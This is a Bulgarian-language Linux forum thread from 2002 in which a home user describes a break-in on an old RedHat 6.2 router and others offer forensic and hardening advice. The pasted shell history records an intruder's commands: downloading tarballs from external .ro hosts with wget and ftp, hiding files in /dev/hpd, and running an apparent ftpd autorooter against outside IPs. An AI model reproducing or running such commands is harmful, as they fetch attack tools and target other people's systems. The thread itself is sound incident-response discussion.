|
|
VNIMANIE: Izpolzvaite forumite na saita za da zadadete vashite vuprosi.
Vupros |
Ot: eureka (eureka __@__ mail __tochka__ bg) |
Data: 11/19/2002 |
Zdravejte,
Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa
na s koito ne moga da se spravia sama.
Predi okolo mesec si pusnah kabelen internet, i tyj kato
tova mi beshe neshto kato "detska mechta" - vednaga podkarah
na ednin star Pentium na 188 Mhz RedHat 6.2.
Spriah pochti vsichko s izkliuchenie na
DNS,http,Authentication service na port 113 /NE ZNAM KAK DA
GO SPRA/, i kachih SSH2-non comersial version.
Configurirah go da rutira vsichko praz nego i s ipchains
maskirah localnite adresi.
Kompiutyra raboti taka v prodyljenie na mesec kato az
chat-pat vlizah za da pocykam (opitvah da si podkaram
multi-ruter-trafo-grafer(ne sym)) ... i taka.
Predi dva dena se lognah i ostanovih che imam mail !!!
tochnia text ne moga da kaja ..
//za syjalenie dokato chovyrkah sym zatrila mbox-a//
..no beshe neshto svyrzano s err pri logratate
zapochnah da se chudia i da "rychkam" za da ustanovia
prichinata.. i se natyknah na stranni "pisania" v
history-to:
789 exit
*********
790 cd /dev/hpd
791 cd /dev/hpd
792 cd /dev
793 mkdir hpd
794 cd hpd
795 ls
796 ftp lordice.ro
797 ls
798 tar -zvf 1.tar.gz
799 tar -xvf 1.tar.gz
800 tar -xf 1.tar.gz
801 tar -zxvf 1.tar.gz
802 ls
803 tar -zf 1.tar.gz
804 tar --help
805 tar -tvf 1.tar.gz
806 rm -rf 1.tar.gz
807 wget folositoare.go.ro/1.tar.gz
808 ftp 65.126.126.199
809 ftp 193.231.236.41
810 ftp 193.231.236.41
811 wget imperr.home.ro/darkbot-6f6-r6_tar.tar
812 ftp blabla.com
813 ftp alyla.net
814 ls
815 tar -xzvf darkbot-6f6-r6_tar.tar
816 cd darkbot6f6/
817 ls
818 cd dat
819 ls
820 cd ..
821 cd docs
822 ls
823 pico README
824 cd ..
825 cd../
826 pico
827 cd ..
828 ls
829 rm -rf bitchbot-1_0_2_tar.tar darkbot6f6
830 rm -rf darkbot-6f6-r6_tar.tar
831 tar -xzvf superwu.tar.gz
832 cd super-wu
833 ./superwu 64.18.125.90 21
834 ./superwu 64.244.71.19 21
*******
835 cd /mnt/cdrom
...
kakto mojesh da si predstavish uchudvaneto mi beshe super
goliamo...
s enda 'last' command ustanovih che ima zapisi ot roda
**
ftp ftpd12124 pD9514DE2.dip.t- Tue Nov 5 14:50 -
14:53 (00:03)
ftp ftpd1645 telehouse-103-1- Fri Nov 8 09:39 -
09:40 (00:00)
ftp ftpd1276 206.48.88.103 Wed Nov 6 14:10 -
down (03:12)
ftp ftpd872 160.40.15.54 Wed Nov 6 02:07 -
down (15:16)
**
:)) .. ADOVA RABOTA ..
dokopah se do 'superwu' i pri startiranetpo mi iska
password
v edna ot poddirectoriite otkrih 'README' v koeto pishe
samo!!:
password:wegotelectricstyle
seshtash se che ia napisah ... i mi se poiavi
"Ask Electricy members for this"
ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li
oshte ne
ot togava gi tyrsia i ne znam kakvo da pravia.
Obshto vzeto tova e. Razchitam na niakakvo mnenie i support
Pozdravi Eureka
|
Otgovor #1 |
Ot: van |
Data: 11/19/2002 |
Sled podobni izjiviavania 100% sigurnost nyama. Az pone ne
bih bil siguren, che ne sum propusnal neshto.
Moya suvet e sled kato i bez drugo mashinata ne pravi nishto
osven da marshrutizira/maskira trafik da formatirash diska i
da preinstalirash. Spri DNS-a ( ne vijdam zashto da raboti
ako ne go polzvash po prednaznachenie). Spri httpd-to ako ne
se izpolzva, izpolzvai tcp wraper i ogranichi ssh vruzkite.
Sushtia efekt mojesh da postignesh i s iptables/ipchains
Za da spresh Authentication service e dostatuchno da spresh
identd.
Ima edno obshto pravilo, koeto vurshi rabota pri
ustanoviavane na minimalno neobhodimite services -
zabraniava se vsichko i sled tova spored nujdite zapochvash
da puskash _SAMO_ tova, bez koeto ne moje :)
V obshtia sluchai tova e dostatuchno, a i dava vuzmojnost da
se oburne pobveche vnimanie na sravnitelno malko
konfiguracii i da se izbegnat chast ot eventualnite problemi
sus sigurnostta, duljashti se na nepravilno konfigurirani
(ili izobshto nekonfigurirani) podsystemi.
Ako chetete tova znachi ne se otegchavate lesno :)
|
Otgovor #2 |
Ot: tedo |
Data: 11/19/2002 |
prav e choveka ot prednia post - zabraniavash vsichko i
puskash samo tova keoto naistina ne ti triabva - suveta si
struva cenata v zlato :)
mnogo interesen posting vupreki che iavno e imalo hack -
liubopitno mi e dali hacka e sprial s router mashinata ili e
pluznal i po vutreshnata mreja
a dokolkoto niama ps i drugi podobni - ami sigurno sa gi
podmenili s tehni si binaries no v tozi sluchai ps bi
triabvalo da ima ps samo deto niama da pokazva istinskata
kartinka :)
moje da sa polzvali i niakoi rootkit za rabotata - t.e.
avtomatizirani skriptcheta deto triai/promeniat log filove i
podmeniat binary programki kato ps i red oshte drugi neshta
...
vij na tozi adres za razni programki koito bi triabvalo da
napraviat "autopsia" na hacknatata mashinka i da kajat kakvo
e stanalo :
http://atstake.com/research/tools/index.html#forensic
p.s. mnogo interesen post - pishi ako ima oshte novi momenti
:)
|
Otgovor #3 |
Ot: eureka (eureka__at__mail< dot >bg) |
Data: 11/19/2002 |
10x mnogo za byrzite otgovori.
Otnosno syveta za preinstalaciata ... tova e iasno, no mi
se shte da razbera kakvo tochno mi se e sluchilo, a ne da
preinstaliram prez mesec naprimer.
Misleh si za promianata na logovete ... zashto sa ostavili
history-to ?!?!?
A otnosno razvitieto ..
Preglejdah cron tablicite i otkrih che na vsiaka 15 min ot
chasa se startira sendmail na port 465 - ssmpt
sled kato go "ulovih" - //hvanah go vliuchen // i iztrelia
23b se izkliuchi i taka do sledvashtite 15 min..
Osven tova pregeldah logovete na drug kopiutyr v mrejata
kojto e s RedHat 8 i sedi neprekysnato vkliuchen ... ima
okolo hiliada greshki koito se pyrvi pyt vijdam:
Uninhibited service - Access deny
Tova e utre mislia da preinstaliram i da go napravia PC-to
samo da rutira //vse edno go niama// :((
Iavo triabva da ponablegna na firewall-inga
10x mnogo za url-to
Eureka
|
Otgovor #4 |
Ot: eureka (eureka__at__mail[ tochka ]bg) |
Data: 11/19/2002 |
Npravo nastryhvam !!!
Tochno dokato pisah predishnia post na port 32553 - otkrih
SSH-1.5-1.2.27
|
Otgovor #5 |
Ot: niki |
Data: 11/19/2002 |
dokato instalirash linux-a procheti knigata Securing and
Optimizing Linux - Redhat Edition (primerite sa za
redhat6.2)
sled kato konfigurirash s-mata po knigata (i kato mislish
razbira se) nqma da imash problemi.
saita e http://www.linuxdoc.org
|
Otgovor #6 |
Ot: tedo |
Data: 11/19/2002 |
iavno ili sa nachinaeshti ili ne sa se setili ili gi murzi i
ne predpolagat che usera deto e hackant e tolko napred s
materiala che da si proveriava log filove i tn .. :)
neznam ... no kakto kazvash ti e nai dobre edin zdrav analiz
da mu hvurlish na celia proces a to preinstalaciata
nai-lesno :)
moje da sa polzvali niakoi exploit na servicite ....
moje da se porazrovish na
http://www.securityfocus.com/
search -> bugtraq - da vidish ima li i kakvi exploits za
redhat 6.2
ako ne sa mnogo kritichni mashinkite i mojesh da gi
poostavish niakoi i drug den i samo da nabluidavash kakvo
praviat shte e super ;)
opitai ettercap :)
http://ettercap.sourceforge.net/index.php?s=home
|
Otgovor #7 |
Ot: !!! |
Data: 11/19/2002 |
I Nikoga ama NIKOGA ne zabraviai da proveriavash i da si
slagash security pachovete koito izlizat za saotvetnoto
distro! Ot puskaneto na RH6.2 nasam sigurno sa izlezli
stotici fix-ove.
|
Otgovor #8 |
Ot: bloo |
Data: 11/20/2002 |
Mnogo mi e chudno, koi e toq "haker" koito shte napishe:
....
804 tar --help
....
Za mene tova e nqkakyv neuk tip, koito e zarbral po nqkakyv
nachin nqkoq druga parola i si e pravil opiti bez da se
pritesnqva mngo mnogo, che moje da go hvanat, taka che,
predi da zakliuchish, che nqkoi e "probil" po nqkakyv nachin
ot vynka, se ogledai okolo tebe
|
Otgovor #9 |
Ot: Naroden lyubimets |
Data: 11/20/2002 |
Kakto kazaha kolegite: niakoi se e podigral s teb.
Za sledvashtiia put shte znaesh kakvo ne triabva da se pravi.
Ident se spira s '#' v /etc/inetd.conf + kill -HUP inetd
Na www.porcupine.org Viettseto Venema e slozhil svoi
razrabotki. Vizh
ftp://ftp.porcupine.org/pub/security/index.html
ZHivei zdravoslovno, sledvai Bugtraq+updates, sportuvai s
gadzheto si i vsichko shte e nared.
|
Otgovor #10 |
Ot: Nikola Antonov (linux__at__logos __tochka__ goto __tochka__ bg) |
Data: 11/20/2002 |
Po-skoro prilicha na beznakazano shetane iz sistemata. Poburzai da si
smenish parolata za root s niakoia po-trudna (da ima bukvi, tsifri, malki i
golemi bukvi, i spetsialni znatsi ot sorta na &, $ i t.n.), komentirai vsichki
redove v /etc/inetd.conf i se pozamisli koi ima informatsiia za akauntite
na kompyutura. Deistvitelno, "haker", koito ot 6-iia put ne mozhe da
razarhivira edin obiknoven tar-arhiv, po-skoro i sam ne znae kakvo
pravi. Da ne govorim za "slonskite stupki" v history-to.
Otnosno podmianata na ps i t.n., vizh dali niama niakakvi promeni v
promentilavata PATH na tvoia profil. Mozhe prosto da startirash niakoi
troianski kon ot niakoia druga direktoriia, a ne ot podrazbirashtata se
/usr/bin. Vse pak, imai predvid, che ako tova se e sluchilo, nishto chudno da ti
znaiat root-parolata, osven ako i samiiat "haker" ne si davas metka kakvo
pravi, a prosto izpulniava sliapo niakakvi "hakerski trikove".
Ne mi se viarva da ima niakakvi porazheniia v sistemata. No tova ne ti prechi
da si pusnesh TCP wrappers (tcpd). Ako vse pak se reshish na preinstalatsiia,
sled kato napravish chistata instalatsiia, si pusni Tripwire. Sled tova shte ti
e lesno da prosledish kakvi promeni sa napraveni vurhu sistemata bez
tvoe znanie.
I naistina, zashto ne se otkazhesh ot tazi "antichna" versiia na RH?
|
Otgovor #11 |
Ot: Lamerix |
Data: 11/20/2002 |
Znachi kakto kaza nqkoi po-gore dobre shte e da sledish
securityfocus -> bugtraq za exploits i dr takiva nestica,
oshte poveche che tam si pishe i koi sistemi sa uiazvimi i
eventualno reshenie na problema.
Po sushtestvo: tova koeto e svalil vzlomadjiqta se naricha
"autoroot"-er. Tova sa novo pokolenie rootkits, napraveni ot
crackerite za da si ulesnqt 'zanimaniqta'. Mejdu druguto
tochno na foruma na securityfocus imashe interesni postingi
otnosno tezi autoroot-eri.
Tova koeto se vijda ot historito e che tozi nqkoi e vlqzul v
tvoito pc i sled tova e svalil ot ftp server samiq rootkit
(ftp-to kakto vsichki vijdat se hostva qvno ot nashite
susedi ".ro" a i da si priznaq i az ot rumunski serveri sum
teglil takiva autoroot-eri da vidq i az shto za chudo
predstavlqvat).
Otnosno mnenieto na Nikola Antonov, moite uvajeniq kum vas,
no probvaite da svalite edin takuv .tar i ako go
razarhivirate ot purviq put imate cherpa ot men - izrazqvam
lichno mnenie. Prosto samite arhivi se razarhivirat po
tochno opredelena podredba na opciite na 'tar', zatova i
suotvetniq 'hacker' sled kato e probval nqkolko puti da go
untar-ne se e vidql qvno v chudo za da napishe 'tar -help'
:)))
Bye i sus zdrave
|
Otgovor #12 |
Ot: Losh |
Data: 11/21/2002 |
ei sa i az idvam.mnogo mi e interesno no nishto ne
razbiram...
Izchakaite malko da ponaucha neshto i moga i az da pomogna
:))))
|
<< LPRNG+apsfilter (0
) | mandrake 9.0 + lan + internet (2
) >>
|
|
|
|
|